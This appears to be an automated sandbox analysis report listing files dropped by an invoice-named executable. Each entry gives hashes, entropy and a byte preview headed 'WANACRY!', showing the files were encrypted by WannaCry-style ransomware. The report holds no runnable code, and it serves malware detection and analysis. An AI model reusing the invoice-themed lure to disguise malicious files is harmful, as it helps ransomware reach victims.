                                                          Reputation:unknown
                                                          Preview:WANACRY!......u...slR.(..P.K......L...N...L..+Sp.4...r`..5v+..lW^..r.M...\~...F.D'.:.5............F..O.2...$ B3.....G.n.w.N..5.41.....,?h..n..M.. ./....d0..gb.@..N....]..I..EUz2..+._52j..(.q.\.l...a......,7i..T[.dr....pL.5R....I..z...M..Ju...t ...nL...Nt...................z.F.......c.,<.v>xE...Z..[&...z.2.<..7*.... K...mv..s.*.V]...B`...%...jb..uN.E...2.sC.1........Q.Y...v.....).:..G*....Z.=.B...H.<4.K7(.]y..+7..H.{I.....Kd.J.c.%...Js.....{|..b0..37g....'....Pl..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2040
                                                          Entropy (8bit):7.901243104689633
                                                          Encrypted:false
                                                          SSDEEP:48:bkUWPU5lq8IEFrNpD3/cUefr3+ZgGYaONm35NqciZPZ:oDPU7q8IMpDcU23+aKOEpNU
                                                          MD5:78B67D32F4C56543672EFBADEDA91260
                                                          SHA1:8832510D69E8750A46DD907181140AF6A5B55748
                                                          SHA-256:BCBCA181D66299540D087F8FB692FF8AFB3444FF7BF5DF97C3467E752E3C4CA9
                                                          SHA-512:2F75A2EB9D293D67A7A0B49F3174892AE26CDCD2AC22A015100E0669AA21422A1E765B59B4CE22D79F15B2D7CF19DACFCF0B05D78C251F56F9C1E7B22635A080
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....t.....W[iz....O?..j...,.V.ZnWr....~%.pQ+.:.(..A].....5?.!...vI%.<.O..Lb..4....IC ..4iY...s...P..$..2..........b|....G.......t.*._......R....\.4VI1B.R..t.[X..,.M.[.="../.@.P.2...'..........].*cy.q...]...tJw......T...Td$.\...........Ng(.)f.................}...]#.U:q.q...0..`..t..{.w3>X.e..'L.....j.y.w.$.#...7......?].X..=mB;0..........0...O...$z...w...J._.........8.&Oy.6...a....R1.Cx...6.o.?T'...RKJ.j..N._.r>..Z..;.&..;:E0.@.`A.#.9....B....{q..^<.....@......u+.UopI.{...%1~6...lY..B.....c.....>.Q..=..$.I..~WIDw.L.....e._.T.U.J..i.. [...V.D.3..P.C>..~..Nt.#r..i.N..^.p-......WLD...gS.k.4.Q]H...}..r..zE..JD..Q..J.W.>.....c..o..w...|Z.....f........@...o!..^j)......E....g...sp..LN..uZ[.....F.........q.=4S..........~u..B.?o..IT.,.......<kp..:u.....\J.....F$8v...;.~i....L.3...$..4$...<..w...#8kv...DwIm...s.5n..k..0.+N.o...Z.W...q......R....'..2wV8.......6!aD..v......fz.{......G..M1../b...vl:..-...G..........C..L.y..|...n. ...cD
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):843176
                                                          Entropy (8bit):7.999788634715214
                                                          Encrypted:true
                                                          SSDEEP:12288:n8FV+gDrkEfLDJHpO90B9mC3neXU/nX8VDuGcplmFwD:n+cqrkEfLFHpO9u3eM8VDuGemc
                                                          MD5:2F03DA0645E21B2CD1B904736642F3B5
                                                          SHA1:C832942CB5EA2E32C01C0C09FB7369530FD2D48F
                                                          SHA-256:A41F3961CAD24D324957A12B5B90619D86DBA9C62DB218DEB8CBB8956589640F
                                                          SHA-512:F71BE940A0E7EF2C8A6A2CAE1436C655B1CC93C757EB11C903D1889FEEB4654E80CC6F99C8CE13292EC772BD5B1588544530A86BBC92A9C39F0267E5857919FC
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....L.*&FX...%,.F....W.r.K...^M..G!..K....6o..l....O.6.(...8.!..g].....g..Y2..al....i.o....6.,...'.TFp!y.:...c...;^.s98.....S...W...k..<sbK...B..Q6.\L...R.....%.3..g..|..io`.d..=..{..r...E...Y..%...~%_.N.(..U=..@....(..A.}q.......`X.D.e.....~A...K..............B2!..R...t...{VE./..E../..@....};a.5.r\Y.P$f...Y.Y....T .gU.\...7.,qqL5e ....><..@...o..H].r......[.\/s3CN`..4b.8..D...t...Z.S.].u...p.7a..>...DX,..P..9...$..O.U.... .AQ..#./..q..!.(..L.KB...5..h....Y.[.......;.C|..U..f.hY......z.......u..%.6..$..k.j..O.%.."....].,E..u.5f @..T#.?........9.....H..*.+.e.Z...PPde...h............\xhx....k...~C...g7..K...o.M.T..5i3..>.|.(.@.z... ..5:.Np......^..h\.[}2..8.4$....-...Yvfm...N.1.b..c... .F.P..#3(..a.<@...0.s..w/..U...[>.:Y."..Sv...}.a.-[..1 ...Z.VrL]..b..r.L..^%i..UH.............Z.l.[. m.X.D'.:.{....k.T^.......U.n.|..!0|..........m.J....f.T}...6..lx.~..RC.r;6...x.$....J.6J.r.....2 Y.8...[.c.hP.... ...t.r.;q.i.EV|....B........S+!....`
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11832
                                                          Entropy (8bit):7.984960513403079
                                                          Encrypted:false
                                                          SSDEEP:192:w70UPbN9uvTQIIKVhbZqZVsTdSEcCzsSOz7VDKJbVrDK59fU9Gf217e7krS3vbj1:w70ub0bIEhbZpRSPCoSE2Vy/U4ulcxz5
                                                          MD5:79AC7C67A8FCA2C70C1AD74DD7F5A6F9
                                                          SHA1:E2DABDEEAAEE1EC1288DC59661AED1197BB8B36F
                                                          SHA-256:551FD4F9F94582A092C2149D46FAD0554689D74417315C15CFE55747903BDF64
                                                          SHA-512:885E78D5FC6803B0417385B5D44CAA1B718F49EC06D53D77C8C432768D4707233DC3F1F0CE929007550301E22FD685750A1279132F6F029DBF074E52450E8C9C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........t...%l.{.FWM.r..m.%h.S.~.....9.k]....C\D..D....b.,..4=E.8..a..-U.z..i.x....w{z^...8..O....T.h.-:.w..;l...<...\./{&..K .......mvi..D..G...T.D.....QA4.AZ....b4L.y{....H3.n@..#C.P............9...V|..O..9..g...._ ;7.D..1.t...Y.V..C..z.....I.x.l.G........-......... .Ot...b.w....yA..E...G..Duts:Z..g......;....w3..of...z.=.$...F. ....8.c...P..("n{c..AI...T..!.u..)$.A...tx]l.t.......g`....u..9z4../......<.Dh]..~..K..c~...<.$.....OR.g...w..)nt.......L...1'..3.n...\...B.E.1...*"I.6.qu.4...C.f...........+..y.J..r.....G.."....VL..U....=.elh..+`O."SH.9...W.e:k83W.&u...k....~....}.w..S.Y*./....C^..<....Y ./,U.......&4..+.z.,.F.dK.>..qQ....o.g,....g}.o]X....dN..tD..&....v......B..;H.i..Us...........V.B..!.7...x..T...@..=<...U..Y.~.f..&.AP."4.......:D....08.=bP....BpM..>.......#%U=C...R.^O.rS.;..w...=.........`.B.~|.....Bt..j.K.I.Ooi......c....13.j.D.$.0......dun...x.{.o<n..)/.]S......k..Z.....d....NX..T{R.........3!.Z.....3..oL...3......q
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):408
                                                          Entropy (8bit):7.343414000541552
                                                          Encrypted:false
                                                          SSDEEP:12:bkEYX0mfwDgqRMiN6WDqsh6w4+sTDy71ein:bkbIDBXNPussmJ71bn
                                                          MD5:FD2AA5737C74030CC9B3051001C36203
                                                          SHA1:FBA47A0D35D4FEB932BEA37CAD03306276E9843A
                                                          SHA-256:E0DCED8A0838844A0954FFCD73A10788016C1791FBEDC5D7F9F33C033FD77FAA
                                                          SHA-512:250023F2FC822E9C82175AD26209B550922D5F54D3F604B3A61512B4776C9D7163187EE8C100C3DEA333EE86226B61A378E1EAF93531903D5D1F963662A6EDF9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....6(,....L;.@sQp.)..7.Qc.v#..Wh{ou.....M.a...[.X..j......[Qe.u..k.....{H&.g...q.3..r.E%#..5.<1rX.i._1/.._...w.....)..Kbp.j_.u...`.........=..b.....4IFh+.j.....@..v..e.....W:.d......*.n........'x~.g.......*.B...~K.]\q....n..).qd._..#Q...d.F..=VSX....y........4.1K.g..../..k...,.No..8,8.........o..2D\....hp.c.d.#s.&..s.^`..c}<.i...L....C.....1@...K.Zb.bb.#7.m.....7E.........&..j
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14632
                                                          Entropy (8bit):7.988175595480435
                                                          Encrypted:false
                                                          SSDEEP:192:2kukotY/Z5E/ehCLPvmWjt9U7iB1DzOnIOS6dMotqeyJh1dTFlLsrSdoz56FL/Y1:2kukD/3EWqPvm0gjImo7QjzY7g
                                                          MD5:FA1774F42FF9C625D88E1740B1AB37CD
                                                          SHA1:C120DE47B83F62DEB0BFA63FBEEDCCEEF26D07E0
                                                          SHA-256:9B47F705A758A507BC6C73E58268BA92A2CE35636E97D3DE53A14B8BD7D855DE
                                                          SHA-512:04C178C338847E53318180BAEEF6E3EA42E97FF487B43ED534E0FF85B2966FA7177FF372C7A5243EC3FF3D3676CA18BA7ED1FAF3B6B3EE0E16C90868A58181D8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!............iAn.n..J.W......{WV.........._R...m.}.[,..Ej..f..&.q..C.G:8.Kc..`.Dw.g..r.x..s..M..~U}.(u....i..Pp...+..UY.t....C`.Z..q.....fZPst..h.s.l.Z.dH.>..I.tv2.[...W|....N.....n..N&..W....P.s1z.V...Z.q..SRm@.&S......W.q..k....c....B..22...0............8.......Nt..)...\..wG.b..p.F......r...%q..L..B.i.."5.....Z:.s5..M.'...u....71.pgd..O.j.=NW...I.R6.&$b..4.X.T..0 .5....m......k}....q...W.vv..D...2<W...F..s..T.s....=....W2<z.'..).P....[.o..F.\....J...!G<..t#...........8...3KX"7l..?,.r:,lV.X.|..m#...n..M.q.#...=$...y.%G..O.....G.&...X..&..i)$.&.`..v.~}....l)..H.{G.Ah.Bbu...#!.....9..gH...m..t...E...D.....PW]f....M....4.I 0.N.(.s.....'O_..i..C_....:.%...b#.0...C...6N.~....]...}j".......{....`........Z.3.....MzFNT..2u.S..bF...-Pcv.y.<.#>S.}..,..@.H...7.=d.~y....~6W...4@.."....2."W...,.c..".5mV,.a.qA.nA..mb.....o...2./...=". ..../Y/.......Oc.qydK...."@QZ...43......"!...... H..a.$d......p..2.g(.FsYj.P.H.5....?.S.....{%....<<|........LDx
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1946312
                                                          Entropy (8bit):7.999906588517325
                                                          Encrypted:true
                                                          SSDEEP:49152:Qnj/AY4x1qqsqvaa1sNUNBpUnkxlOIfbAz:QnHUhQUfpUnwIITAz
                                                          MD5:CB012652C6D906AA0C012563524B874E
                                                          SHA1:42483487CB741760C7C4ECAD6477CF140317638D
                                                          SHA-256:7059371400F1954F0BBC064A7485F55DC3AF26C8C6DB67876C3192DA5869BD7C
                                                          SHA-512:137622F07BDF9D8922E71AAC3248DDD104BC391F0E0646F6D288CC9147B379820A940E2B455CA9EFC100269503DCB62D34CD8CD054793E66B0092D988189CD2F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1256
                                                          Entropy (8bit):7.846265239284472
                                                          Encrypted:false
                                                          SSDEEP:24:bkQMKcf0F3fB/SQirt9NwfXPc/AzteF8yWnC4PjFI7BqCqyyq:bkQkS3pcRg0/CeFrW7LFsR3
                                                          MD5:41FA123853ECC398FFB9CB8041C03B44
                                                          SHA1:931C6BB9D2FB5800368F9924CFB67EEDAD149B1A
                                                          SHA-256:B1919590562502A7C375637541A9F2C71E1D180792028250111648E01014C41C
                                                          SHA-512:A6D11B2B388943C41384EA304CB7119682C491A549BF51B77EB5063EE395063E2ED3EBE377B47FE32317CE8E6D12C6E99730E14250C123EE10AB245A36BF4F15
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1624
                                                          Entropy (8bit):7.878408213502862
                                                          Encrypted:false
                                                          SSDEEP:24:bk1pm0Z8lFTYw65M6pvYwR3r4Ych8lKIIpgZ3CF6rmzxOVDpfEPdPbni3hxDjWE8:bk1Q0MVH1Ych8lup9bzxOV9wG3D92KR8
                                                          MD5:1EC089C1D29CBA7DEABFB6140F59967D
                                                          SHA1:18CCAFED2954FBA0DF3572221FD2814D3BA401A0
                                                          SHA-256:ED4FA70C4160FB49C5862DDEB3CD9DC0E777B4AF3E266E940AB28F217900760D
                                                          SHA-512:FD74FDF7045C7D0CF051A59F8C261D89A126FD09B30E3EDABFEB6C1814A3AEE8B9AFC15A92059AEAD6A2D459F89B29E9304F7A1C7956A2CA6E8D64E930FB9666
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2424
                                                          Entropy (8bit):7.918030676554136
                                                          Encrypted:false
                                                          SSDEEP:48:bk1W2OuNTWBKa39zNDGs+TDZlYjNbGl4exKhNhN11+pAWzWkf+:o1W2rNKB739RS7DH68U0Ykf+
                                                          MD5:30831F1475336A68C61EDEA798A0671C
                                                          SHA1:56EA9296D31A0E519C8146DF6B15FFCBD963413D
                                                          SHA-256:4D47D880549768044750D46B010455F58B5B5F4D4F89CBD5D2608B68CCC27E21
                                                          SHA-512:7515926FCD5BFC0E1A4631E9BEA323014565248AC2139E0C7127C1A46E0B924030826C4BD0901B96C1CAA09B8D8046F2F8B136E802475719A0AA23812D67835E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):28904
                                                          Entropy (8bit):7.9943617265517135
                                                          Encrypted:true
                                                          SSDEEP:768:jE0O6Jhvdg9otXxGcSaf3Fu/zhdurxlfJRsbNeCX:jE89g9o9xGqs7hsdlfJRsbNeCX
                                                          MD5:1AE80786BB7600618DE6A8199D468FD6
                                                          SHA1:562B2EA9482E92012F3C41B5D33D92CD9DFC318B
                                                          SHA-256:C324EAF8BC55F0F1335DB73D57B3B437712F11027ED85574792C3F3691BA4D52
                                                          SHA-512:AFA4B6133A2AAB2E5C3E0BA84B4968D55D1B0DA4C2345140F95D125E0797E8C4CE4470EDD5D806C685CBAAC4D70B08A6947CB52D0F6B9647418BC6F79DBA8DD5
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2920
                                                          Entropy (8bit):7.938887704631897
                                                          Encrypted:false
                                                          SSDEEP:48:bkw9pTowsKB5mFZTkbVrFv+WDGU3/EvisAIRn0lJGXEB1/XGaLMWhJYlv7EX5Uoq:oCTowzB5gZA8WDGUMqsAIN69oWwlv7E6
                                                          MD5:6E395D18C091E4983F0BBBE85E226EC2
                                                          SHA1:506D99951ECE9E6CD4F35FAE9DD365BA8BAAEBB2
                                                          SHA-256:AD279051446B0CB00483FEBF439F7AB39FDAFAAEA1EDD9A795B368CFA57DE304
                                                          SHA-512:335984980911527483D9F98A8705BE8D2ED2E28B266CDF54C0638B693CB70ADAE621F7EA8FDB9F1E2953AACB4A232FB47378ECDA8942DA086F2AE459B0AFBF09
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1441224
                                                          Entropy (8bit):7.999862987686474
                                                          Encrypted:true
                                                          SSDEEP:24576:dwtBWrzZ0i536N1tWNYwIGxAHa49mGiINUQekQOnBeoDkHNUwew:dwtBEzZ0UA12YaGHaomGiImQPQOnBeoE
                                                          MD5:A817DE3A2DA323C5AB5FD407703E1A33
                                                          SHA1:60E81607AFA834B3CE3FDB02E02528D1C84AA848
                                                          SHA-256:FD5A985DDA28C4748C0E19D1B9BB055A523673114EF71D1C3EA13C0A38D17874
                                                          SHA-512:5EEAFA36FBAF6D3C7B0726507F92DA7C9546CB3299CECB6D3B63DFE10E99D7DBECAF7A26C912E1F015866E81CE3F526685E4EF116FA5CC66C9C3D8F8C15D81F6
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....K....8..v......B.vu...-..t.~k.n.v...}<-\...kk....%.6.L..X..4.5....3.4?9.zu.|.H.}..%.B....4z.G...A.....I...k7F..X.......c.y`........6..3.=...=....(.+9..rKN..o(RI..?&.X...J.Wx.\(.#....*<..x......."...Z......:........b.6%...8..NGm<......O.My D..=................) ....b...+......H..&......+pq..E.!../...?x`y..j......K....b.#.HF....x...@..{....:C....CpDL.I....2..xv.VT<8..H....S..0.37`..SHp..w:..K........1..B.Jr.EZ_....Z...b.;.KSbb..rC.xM..IAm...IY!K.gY2..h<["..;6g...l..CK4..~....v.ap.^r.3F..Iw.C...d.9.]0.}..S....;N..j...=...H..$.j._a.hH.......-!o.a37`c..j=.:..^......&%Lr..5.veP..<G..6......5.'.iV np6..{.Aj.......i.s.L7.$..'.O.......o..G..t.9.W.........}v..V...joa.$..^...o...5.....ge]Z.vX.. .....s.....8n.,...+.)....*....A.h.....p.....^#...VK3b&.....I.+.NQ%.g.$.+..)...'..... ..'{.....&...E...].T.=..L....cW.r...V..k(...8GK.sE..u..=.f3..e....p.....He.L...&.....8>V.j.-}....`}...dY..C}.B...D.%...&.3:,....Z,.....-..}...xq.#>F...O.._.#
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1441224
                                                          Entropy (8bit):7.999862987686474
                                                          Encrypted:true
                                                          SSDEEP:24576:dwtBWrzZ0i536N1tWNYwIGxAHa49mGiINUQekQOnBeoDkHNUwew:dwtBEzZ0UA12YaGHaomGiImQPQOnBeoE
                                                          MD5:A817DE3A2DA323C5AB5FD407703E1A33
                                                          SHA1:60E81607AFA834B3CE3FDB02E02528D1C84AA848
                                                          SHA-256:FD5A985DDA28C4748C0E19D1B9BB055A523673114EF71D1C3EA13C0A38D17874
                                                          SHA-512:5EEAFA36FBAF6D3C7B0726507F92DA7C9546CB3299CECB6D3B63DFE10E99D7DBECAF7A26C912E1F015866E81CE3F526685E4EF116FA5CC66C9C3D8F8C15D81F6
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2008
                                                          Entropy (8bit):7.908545865090877
                                                          Encrypted:false
                                                          SSDEEP:48:bk1HrwhR1vgzf6PzniUJUREd2QwsC4KgMJLp:o1LhzgYagccLp
                                                          MD5:7DB187CBA8905EA01882AB6CA002EB3D
                                                          SHA1:6C9808BB52AE6BE7B13CD33DB28910AB2FF5715F
                                                          SHA-256:E4F806FA44A411EDD054ECD1DA42ED6210E306D3D0FE6734ABD69EEDBB70E459
                                                          SHA-512:DD356AA061D3B00B4772033D238FC0236DADA53A4510CC9C56CF68867A99E36EEBDF93830758A8331388AAF38B9FB67533A21653457626C7104DA1445FA54286
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2937064
                                                          Entropy (8bit):7.999938422952748
                                                          Encrypted:true
                                                          SSDEEP:49152:etnw7Ka1OvrElSDFjkEwPo2ixgw6nPZ7x7Aeqdqb3oa0+LwrG89yrb8rtIAXX2:etQK1jqSdPwPov8B7xPr3IrG89yrb0bW
                                                          MD5:9D8F14667FE899F1F1FA404B5FFDAA9A
                                                          SHA1:1FC2DA1D1E1508EFA45BD3F4DA7EDD47BFBF2778
                                                          SHA-256:6D05076CAB91B9A8008B41E8440F45745C233915FAD8878D240A8E64A9E78322
                                                          SHA-512:40220A9CE6931C1AECDD4D72904DF9A347E1008B40C7DFBC0C6D2B353095F5779F11295794855DA7B31D99CEEE2916714D2ECC7653D89CC5BF5716B039D5C2E9
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1160
                                                          Entropy (8bit):7.825784384656725
                                                          Encrypted:false
                                                          SSDEEP:24:bkAYXY2pXecm54WpDhpeeFuOM7MUz6+XlZ/sOIFgzucSIVVI6:bk82pXW4MDeCjK6+XvsrFgzucSoVI6
                                                          MD5:FB74B973AF4E19F1E2689B51D1613A8D
                                                          SHA1:9CE74CC02AB67B118F3DA53711452465A0901EFA
                                                          SHA-256:AB5373AF98752D08E7D9E65F1DF679BBE3B1D7A1CC4B143677D7C445227E6811
                                                          SHA-512:EECE961C84B6EEDE8B8E1ABA775652535D03E2AADE932EC44B6BE76113125E9FD899B3BD5A15E2F7CFB58CAE6059D4E1C881D642425E257E87CBA63005BF8F56
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2600
                                                          Entropy (8bit):7.915666752910738
                                                          Encrypted:false
                                                          SSDEEP:48:bkihRV/bXIMUiHXL5XTy4I8Vf/hAxwQMkXT9zgCVJHjZwFtfqxeZ0j1:oiztIKHhW4IAHhAx9MkXT9zXVj+FtfqX
                                                          MD5:99E07233235CB0E6FA5DAE4490B24BD1
                                                          SHA1:E601D8B8DC0DDDFDB3D73F640DA82A3DCEF1B6CB
                                                          SHA-256:CFFDE9A98E7D8A1839D18B9A4BECB8B54A4B95E208562C7FA86A4C22103162E2
                                                          SHA-512:53DC85948642823D29C94A2CE50D182075037795CF6AB40EE0E5BF032D03D88F5B086A94B3907C9D0440FDB7CF5B65E296CCFBF87D54F03C2D1C27BEFBBE39B6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6856
                                                          Entropy (8bit):7.972626004561927
                                                          Encrypted:false
                                                          SSDEEP:96:oJPm5V2rx0cVTHl7IwR25G6VSGbS20LrI1VKJWOYlnifgKTjA4s8YkyKeAk4f60:+PCs6mHM59VSVWA0iIKQqYHKeAk4fV
                                                          MD5:52A459919CF43A3907C6618EEF9C1EB7
                                                          SHA1:41CFD55DD6DF10D3B4B5C4E591CC0E39FF478E32
                                                          SHA-256:E7B2C25C073FB737CB98BA03F7622EECE658E1305B0D03DB3A13729AC57E9634
                                                          SHA-512:2327727D9E21C02FA0A7FD0DD3911524BEACC17472A3490BCEA3A4A5DF4E73689BF05827315591D18C5F4B1799E16A5F5E9D90C40190C4AD72A72C4388D862CA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8984
                                                          Entropy (8bit):7.981059760859407
                                                          Encrypted:false
                                                          SSDEEP:192:hkoYeiBQdJKbstzSC9+1b1onqc1Gf6EsuOtwZyPm0NlGAN9JjbT6:hnYPBQdpSC9jmf6EsZtAGrNI8JjbT6
                                                          MD5:12DFB28E4D2A4C9E6BD6200A8DECF2C6
                                                          SHA1:40E339A2301258414F8402974440AF0BC7D6C3ED
                                                          SHA-256:76D7BAABB97BDE10F26449910B7382BCCC0B9C0AF189C099F80EA54C91086A3E
                                                          SHA-512:AC90099B84877CF256B983AAEF9BE2EBE26894A41D40E13906A2ABD2235132F71F2962ECF747F1D58C97216CE493F4EFE06E093E7AB8CF9450BCF89C4D0EE6ED
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7384
                                                          Entropy (8bit):7.972213263078049
                                                          Encrypted:false
                                                          SSDEEP:96:obozSouF8F9aqDQzuqJvOweMP+n/z4PIB/HtbJPa37FMubF6PXzsZl0YjMYR:QozSGnZKv3WKIB/HtlaLuub4fzsgYoYR
                                                          MD5:413D240F36C639465028481527EAC0BE
                                                          SHA1:BC3719D98BBD810B643011D9659B2E0B768127DA
                                                          SHA-256:6C727DB1BE3A778235CA3B081E0983656A584800BF73DF0ACD37BA5A4ABF2984
                                                          SHA-512:86125C7682CDE65AEBB6A32F84705BFA2B830CEE7774F09AC5E1CBF163243774444964BC1C79B2920272EC831EB9B2096984D8164F42926BF033A0C5B0B618A5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5240
                                                          Entropy (8bit):7.966717696349995
                                                          Encrypted:false
                                                          SSDEEP:96:oXrc/V9CBlgHKS/cXnJTPH3fdLvUNzNXejz1vXdUQomiTuUEBAqe6y3Ie545+xjV:+I/V9CBoLcX5XfdUdNXaBvDETuBPe5Dz
                                                          MD5:2EF0D9626DEF5489F1DB7F88575DBC86
                                                          SHA1:D4F5A5AE7DF0FA25435BD5CDDF3929C345A03772
                                                          SHA-256:8481255236E3649354D673BF52932618D593A503BFDE5736AC504C6985A0E188
                                                          SHA-512:FEEC8C7E04D85F2702158C5C0B98B8746AD1D6172877A3E7E1AB3AC30055EFC6766C0A1A9DAE4153A6033ADD0149BE874FFE8E66A76EE73304DBCDE83AD4DBE3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Z..j....H&.d...F...X\7..yh+..4.z%..H.}....W.>...d.i......ej.7.*....3....Z.....)..=?......F.Q.6.iNn.R:Sv..zz..yw..u9t.$...T.;......0..+J3.....l2....D8.Qd.0.fjf.B....h...hT.s...:.E.[.J|'.a..........!.8...w.9...pZ...,...%o.....Ni.z.q.k.b..53p...^....._.......c.p6?e....1....q..|V8.-S....5...i...0..a..._3.Ac|...i..Im.."d.."1+}TS..p.59c...|..x..A.......U..H...ID.s.p..H..n2.......m..d.V.$..y]...S....p!..v.....8w.M~.....D.j.g^>.5LBC.).%$k...n.d.u]..}.v..a0..^.wo.4..-...T....z.M.M$.8bW^.;..o3...z.....&c...[..S..p*. .3y..C:.C.8.u.Mr.rf.4...&N.$'.o....wP!.....y..@GV.......O.......2..n.r.... .KT.8..u.5.N.R.-&..<tw..!B..pL...!.<.Y.s..mT...&2.b.e|.q...5..z6.(..u........>.....7bA/...p.....#....!..= .h.......l.w-.jn`s..N...8..+...d.-A.\.G........N5...6W.|!bbt.D.s..n.n.4<...s...|e..o..m.n..lO../B.X..hP(....W..!.A..l...h.+.ky(w...j.C......T.d..!./.6...b<.......p.~........4.-.....!0.6... ...D.v<.O..Cl....N...i.?.PS...JVLe......$$.FLJ*R.k...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14408
                                                          Entropy (8bit):7.988170201215875
                                                          Encrypted:false
                                                          SSDEEP:192:r7zLZIEm+gmEbZtNE2T+gUyUBn686LMoNWX0KDp2+7Jp8HjneBeELbE/CC1CJS+1:r7KEm+g5t3pUp68nN92k8jgh+7cOM
                                                          MD5:3381C2022EEBC99CAC98FBCE480D6AF0
                                                          SHA1:C83DB86CE643552556F6E29A4371609B83C68D5B
                                                          SHA-256:41BD1DBEF80B5BBE64AD9504B3EDF6FB912DF2AEE761B9AB8FD7E528303E0910
                                                          SHA-512:6193EB43CF2F52A828BDE161DFB9E3055D7A7D266D351A58AC565C6D581761B533974D476B4898B85EA65FD0C1A1BC93F1439D1E71207C8FBF78CEA512334062
                                                          Malicious:false
                                                          Reputation:unknown
